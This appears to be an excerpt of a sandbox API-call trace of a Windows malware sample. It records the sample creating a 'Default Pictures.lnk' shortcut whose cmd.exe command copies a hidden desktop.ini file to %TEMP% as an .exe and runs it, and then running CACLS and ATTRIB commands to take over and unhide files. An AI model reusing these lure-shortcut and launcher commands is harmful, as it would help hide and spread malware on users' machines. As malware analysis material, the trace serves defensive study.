MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="p\x1dﯸ\x12萀\x1d") returned 1 [0178.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="p\x1dﯸ\x12萀\x1d") returned 1 [0178.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="v\x1dﯸ\x12萀\x1d") returned 1 [0178.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, 
cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="q\x1dﯸ\x12萀\x1d") returned 1 [0178.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="e\x1dﯸ\x12萀\x1d") returned 1 [0178.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="C\x1dﯸ\x12萀\x1d") returned 1 [0178.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="Q\x1dﯸ\x12萀\x1d") returned 1 [0178.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="J\x1dﯸ\x12萀\x1d") returned 1 [0178.456] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0178.456] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0178.456] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0178.456] CharUpperBuffW (in: lpsz="explorer.exe \"Default Pictures\" & type \"Default Pictures\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x71 | out: lpsz="EXPLORER.EXE \"DEFAULT PICTURES\" & TYPE \"DEFAULT PICTURES\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x71 [0178.456] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0178.456] CharUpperBuffW (in: lpsz="explorer.exe \"Default Pictures\" & type \"Default Pictures\\desktop.ini\" > 
\"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x72 | out: lpsz="EXPLORER.EXE \"DEFAULT PICTURES\" & TYPE \"DEFAULT PICTURES\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x72 [0178.456] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0178.456] CoInitialize (pvReserved=0x0) returned 0x0 [0178.456] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0178.457] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0178.457] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0178.457] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0178.460] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Default Pictures\" & type \"Default Pictures\\desktop.ini\" > \"%TEMP%\\ppvqeCQJ.exe\" && \"%TEMP%\\ppvqeCQJ.exe\"") returned 0x0 [0178.460] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0178.460] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0178.460] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0178.460] ShellLink:IPersistFile:Save 
(This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures.lnk", fRemember=0) returned 0x0 [0178.474] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0178.474] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0178.474] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0178.474] CoUninitialize () [0178.474] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0178.475] ReleaseMutex (hMutex=0xf8) returned 1 [0178.475] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0178.475] ReleaseMutex (hMutex=0xf8) returned 1 [0178.475] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0178.475] ReleaseMutex (hMutex=0xf8) returned 1 [0178.475] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0178.475] ReleaseMutex (hMutex=0xf8) returned 1 [0178.475] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.670] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp", lpFilePart=0x12eab4*="usertile11.bmp") returned 0x52 [0178.670] GetLastError () returned 0x5 [0178.670] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0178.670] LocalFree (hMem=0x1c6cc8) 
returned 0x0 [0178.670] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0178.670] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0178.670] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0178.671] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0178.671] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0178.671] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0178.671] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, 
dwProcessId=0xa14, dwThreadId=0xc50)) returned 1 [0178.673] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0179.820] CloseHandle (hObject=0x1b4) returned 1 [0179.820] CloseHandle (hObject=0x120) returned 1 [0179.820] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.820] ReleaseMutex (hMutex=0xf8) returned 1 [0179.820] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.820] ReleaseMutex (hMutex=0xf8) returned 1 [0179.820] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.820] ReleaseMutex (hMutex=0xf8) returned 1 [0179.820] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.820] ReleaseMutex (hMutex=0xf8) returned 1 [0179.820] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.820] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp", lpFilePart=0x12eab4*="usertile11.bmp") returned 0x52 [0179.820] GetLastError () returned 0x5 [0179.820] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0179.820] LocalFree (hMem=0x1c6cc8) returned 0x0 [0179.820] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: 
lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0179.820] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0179.821] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0179.821] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0179.821] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0179.821] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0179.821] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0179.821] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.821] ReleaseMutex (hMutex=0xf8) returned 1 [0179.821] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.821] ReleaseMutex (hMutex=0xf8) returned 1 [0179.821] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.821] ReleaseMutex (hMutex=0xf8) returned 1 [0179.821] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.821] ReleaseMutex (hMutex=0xf8) returned 1 [0179.821] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.821] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp", lpFilePart=0x12eab4*="usertile12.bmp") returned 0x52 [0179.821] GetLastError () returned 0x5 [0179.821] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0179.821] LocalFree (hMem=0x1c6cc8) returned 0x0 [0179.821] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0179.821] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0179.822] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0179.822] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0179.822] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0179.822] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0179.822] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, 
bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x47c, dwThreadId=0xa24)) returned 1 [0179.827] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0180.068] CloseHandle (hObject=0x1b4) returned 1 [0180.068] CloseHandle (hObject=0x120) returned 1 [0180.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.068] ReleaseMutex (hMutex=0xf8) returned 1 [0180.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.068] ReleaseMutex (hMutex=0xf8) returned 1 [0180.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.068] ReleaseMutex (hMutex=0xf8) returned 1 [0180.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.068] ReleaseMutex (hMutex=0xf8) returned 1 [0180.068] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.068] GetFullPathNameW (in: lpFileName="C:\\Users\\All 
Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp", lpFilePart=0x12eab4*="usertile12.bmp") returned 0x52 [0180.068] GetLastError () returned 0x5 [0180.068] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0180.068] LocalFree (hMem=0x1c6cc8) returned 0x0 [0180.068] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0180.068] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0180.069] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.069] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.069] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0180.069] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0180.069] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0180.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.069] ReleaseMutex 
(hMutex=0xf8) returned 1 [0180.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.069] ReleaseMutex (hMutex=0xf8) returned 1 [0180.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.069] ReleaseMutex (hMutex=0xf8) returned 1 [0180.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.069] ReleaseMutex (hMutex=0xf8) returned 1 [0180.069] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.069] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp", lpFilePart=0x12eab4*="usertile13.bmp") returned 0x52 [0180.069] GetLastError () returned 0x5 [0180.069] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0180.069] LocalFree (hMem=0x1c6cc8) returned 0x0 [0180.069] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0180.070] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0180.070] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.070] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.070] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0180.070] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0180.070] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xcf8, dwThreadId=0x170)) returned 1 [0180.071] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0180.515] CloseHandle 
(hObject=0x1b4) returned 1 [0180.515] CloseHandle (hObject=0x120) returned 1 [0180.515] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.515] ReleaseMutex (hMutex=0xf8) returned 1 [0180.515] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.515] ReleaseMutex (hMutex=0xf8) returned 1 [0180.515] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.515] ReleaseMutex (hMutex=0xf8) returned 1 [0180.515] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.515] ReleaseMutex (hMutex=0xf8) returned 1 [0180.515] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.515] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp", lpFilePart=0x12eab4*="usertile13.bmp") returned 0x52 [0180.516] GetLastError () returned 0x5 [0180.516] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0180.516] LocalFree (hMem=0x1c6cc8) returned 0x0 [0180.516] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
